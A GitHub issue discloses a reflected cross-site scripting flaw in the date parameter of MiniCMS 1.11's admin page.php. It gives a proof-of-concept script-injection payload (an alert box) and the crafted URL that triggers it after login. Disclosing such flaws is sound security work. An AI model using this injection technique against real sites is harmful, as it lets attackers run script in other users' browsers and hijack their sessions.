Skip to content

A Reflected Cross-Site Scripting vulnerability exists in the /mc-admin/page.php in version 1.11 #49

@thisissuperann

Description

@thisissuperann

vulnerability location:date parameter
/MiniCMS-1.11/mc-admin/page.php?state=draft&date=2024-04
image
Payload:
</script><script>alert(123)</script>
Access the address with payload after login:
/MiniCMS-1.11/mc-admin/page.php?state=draft&date=2024-04</script><script>alert(123)</script>
Then we can find it triggering the xss vulnerability:
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions